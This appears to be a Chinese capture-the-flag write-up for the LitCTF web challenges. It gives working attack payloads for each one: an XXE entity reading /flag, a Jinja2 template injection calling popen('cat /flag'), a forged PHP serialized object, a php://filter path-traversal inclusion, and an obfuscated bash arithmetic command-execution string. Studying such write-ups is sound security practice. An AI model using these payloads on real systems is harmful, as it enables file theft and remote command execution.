Litctf-web

Litctf-web

exx

xxe,

html 复制代码
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///flag" >]><user><username>&xxe;</username>
<password>1</password></user>
一个...池子

ssti,没有过滤

复制代码
{{''.__class__.__mro__[1].__subclasses__()[137].__init__.__globals__['popen']('cat /flag').read()}}
SAS - Serializing Authentication System

反序列化

php 复制代码
<?php

class User {

    public $username="admin";

    public $password="secure_password";

}
$a=new User();
echo base64_encode(serialize($a));

?>
复制代码
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjE1OiJzZWN1cmVfcGFzc3dvcmQiO30=
浏览器也能套娃?

ssrf

复制代码
file:///flag
高亮主题(划掉)背景查看器

文件包含伪协议

复制代码
POST传
theme=php://filter/convert.base64-encode/resource=../../../../../../../../../../../../../../../../flag

根目录下

百万美元的诱惑

rce

/下

复制代码
?a[]=1&b[]=2&c=2025a

/dollar.php

取反绕过,自增应该也行试了下没过。

$(())为0

$_++也为1也可以应该

${_}=""输出上一次执行结果

( ( ((~ (( ((${_}))))=-1

复制代码
%24((~%24((%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))))))
相关推荐
众乐乐_200825 分钟前
Java 后端给前端传Long值,精度丢失的问题与解决
java·前端·状态模式
sz66cm28 分钟前
Linux基础 -- 用户态Generic Netlink库高性能接收与回调框架
linux
Digitally30 分钟前
如何从 Android 设备打印短信(5 种方法)
android
一叶茶35 分钟前
VsCode和AI的前端使用体验:分别使用了Copilot、通义灵码、iflyCode和Trae
前端·vscode·gpt·ai·chatgpt·copilot·deepseek
数巨小码人36 分钟前
Linux常见命令
大数据·linux·运维·服务器·elasticsearch·搜索引擎
casual_clover38 分钟前
Android 中 打开文件选择器(ACTION_OPEN_DOCUMENT )
android
熊猫钓鱼>_>41 分钟前
基于MCP的桥梁设计规范智能解析与校审系统构建实践
前端·easyui·设计规范
若初&1 小时前
文件上传Ⅲ
前端·web安全
若愚67921 小时前
前端取经路——前端安全:构建坚不可摧的Web应用防线
前端·安全